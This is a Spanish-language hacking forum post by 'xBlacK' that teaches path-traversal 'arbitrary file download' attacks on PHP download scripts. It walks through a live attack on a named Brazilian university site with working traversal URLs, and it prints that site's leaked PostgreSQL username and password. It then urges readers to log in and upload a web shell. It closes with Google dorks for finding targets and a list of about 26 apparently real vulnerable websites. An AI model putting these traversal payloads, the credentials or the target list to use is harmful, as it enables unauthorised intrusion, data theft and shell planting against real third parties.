Arbytrary downloader. [ TEXT ] By xBlacK

Es una temprana noche lluviosa de domingo... ajajaja da un chingo de hueva no tener lana y no poder salir asi que decidi hacer un pequeño text.

Bien, a los que no saben que es esta vulnerabilidad les caera de perlas.


Arbitrary downloader a mi forma de verlo es una web-vulnerability muy ... atractiva, ya que los administradores de las webs solo checan que se bajen archivos de su servidor... pero nunca revisan cuantos se pueden bajar jejeje.

Utlizare un ejemplo real para que puedan entenderlo: (al final estan dorks que pueden usar)

Universidad Federal Rural de Pernambuco:

www.ufrpe.br/aci/download.php?endArquivo=

vemos que al pegar la URL en nuestro navegador nos lanza una descarga llamada "arquivos"...

TIP: esto quiere decir que en el archivo download.php esta configurado para que baje los archivos de la carpeta "arquivos". por lo que nuestra inyeccion en la url seria asi:

www.ufrpe.br/aci/download.php?endArquivo=../download.php

y voala nos aparecera el archivo "download.php" para descargasnolo y leer que es lo que tiene...

sigamos con lo interesante... para que quiero el archivo download? si nomas hace que descarge cosas... Bien, en algunos "downloads" requieren de la conexion a la base de datos para saber el id del archivo... por lo que aparecera un requere o un include en el download... pero bueno solo es por si las dudas...

en este caso nuestro codigo es el siguiente:

<?
	$strBrowser = $_SERVER['HTTP_USER_AGENT'];
	if (preg_match('/MSIE 5.5/',$strBrowser) || preg_match('/MSIE 6.0/',$strBrowser)) {
	$compMime = "application/download";
	}else{
	$compMime = "application/download";
	}


	$strNomeArquivo = "arquivos/".$_GET['endArquivo'];
 	header("Pragma: public");
     header("Expires: 0"); // set expiration time
     header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
     header("Content-Type: application/force-download");
     header("Content-Type: application/download");
     header("Content-Type: text/plain");
	 header("Content-Disposition: attachment; filename=".basename(str_replace(" ","_",$strNomeArquivo)).";");     
     header("Content-Transfer-Encoding: binary");
     header("Content-Length: ".filesize($strNomeArquivo));
     readfile("$strNomeArquivo");
?>

no existe mas que la configuracion y validacion de los archivos a descargar... no me metere a explicarlo porque la idea es dar una idea abierta a esta vulnerabilidad.

vemos la pagina que tenemos de ejemplo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

dames en el boton "home" o "inicio" y vemos que en la URL nos aparece /index.php

Vamos por ese archivo a nuestra url de descarga asi:

www.ufrpe.br/aci/download.php?endArquivo=../index.php

lo abrimos, checamos y en la cabecera vemos que incluye otro archivo... template.php

<?php $home=true;
$menu_on = 'index';
include_once('template.php'); ?>

vamos por el...

www.ufrpe.br/aci/download.php?endArquivo=../template.php

vemos, revisamos y vemos que ahi tiene un include interesante:
includes/init.inc.php

<? 
include_once("includes/init.inc.php");
$idiomaTemplate = _COOKIE_IDIOMA;
$idiomaTemplate = "";

?>

ahora toca a includes/init.inc.php ser parte de nuestra coleccion...

www.ufrpe.br/aci/download.php?endArquivo=../includes/init.inc.php

en el encontraremos otro archivito jajajaja, cansado? a veces es laborioso buscar los archivos... pero bueno juro que el proximo es el ultimo.

abrimos y vemos que incluye:../includes/conexao.php

   

include_once("../includes/conexao.php");

nos lo bajamos con la siguiente url:

www.ufrpe.br/aci/download.php?endArquivo=../../includes/conexao.php

y voala... tendremos lo maravilloso que hace a las bases de datos:

<?
	$dbConn = pg_connect("host=localhost port=5432 user=webuser password=DMv@19,% dbname=webufrpedb")or die("erro");
	
?>

Host: localhost (si tiene localhost puede que tenga un gestor de administracion como pgpmyadmin, phpmyadmin, etc..)

user: webuser

contraseña: DMv@19,%



Ahora solo les quedara buscar como logearse y dependiendo de su criterio subir una shell por medio del mismo gestor, o buscar el login y pass del administrador y logearse y hacer lo que se les de la gana...

Espero haber dado una idea clara a aquellos que no conocian esta vulnerabilidad, o que comienzan en el hack.

dorks:
[*] = com, net, org, etc...
[**]= tipo de archivos doc, psd, pdf, pps, etc...

allinurl:[*] "download.php" [**]
allinurl:[*] "downloads.php" [**]
allinurl:[*] "descargas.php" [**]
allinurl:[*] "descargar.php" [**]
allinurl:[*] "descarga.php" [**]
allinurl:[*] "bajar.php" [**]
allinurl:[*] "force-download.php" [**]

algunas webs vulnerables:

www.redalimentaria.com/archivos/descarga.php?id=
media.eleconomista.com.mx/contenido/pdf/descarga.php?file=
www.aoaxaca.com/descarga.php?f=
www.colibrimty.com/descarga.php?file=
www.probecarios.com/descarga.php?file=
phytomedicamenta.com/descarga.php?
www.asambleaapostolicamexico.com/descarga.php?tipo=
www.latinpowermusic.com.mx/datos/boletin/c18/descarga.php?a=
www.plenumsoft.com/download.php?file=
www.miempaque.com/download.php?Archivo=
factum-marketing.com/download.php?file=
deimaginaria.com/download.php?file=
coripa.com.ar/download.php?t=
everdaguer.com/pares/docs/download.php?file=
steelpool.com/download.php?id=
licitaciones.iplan.com.ar/download.php?id=
trenesenescala.com/descargas/download.php?f=
marlenadeblasi.com/download.php?doc=
cvarbitraje.com/force-download.php?file=
cayetanogutierrez.com/download.php?doc=
medicamail.com/download.php?file=
soraya.com/download.php?download=
municipioiquique.com/doc/download.php?link=
marcosrosenzvaig.com.ar/download.php?archivo=
camara-comercio.com/download.php?file=required/connect.php
rodrigomatarrita.com/inc/download.php?file=

Fuente:DDLR

Bien, bien , bien =) me gusto! gracias por compartir! ta bueno!